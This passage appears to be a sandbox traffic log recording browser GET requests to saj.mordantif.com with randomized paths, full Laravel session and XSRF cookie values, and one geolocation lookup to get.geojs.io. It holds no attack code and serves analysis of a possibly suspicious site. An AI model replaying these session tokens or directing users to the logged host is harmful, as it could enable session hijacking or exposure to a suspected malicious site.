https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://saj.mordantif.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; 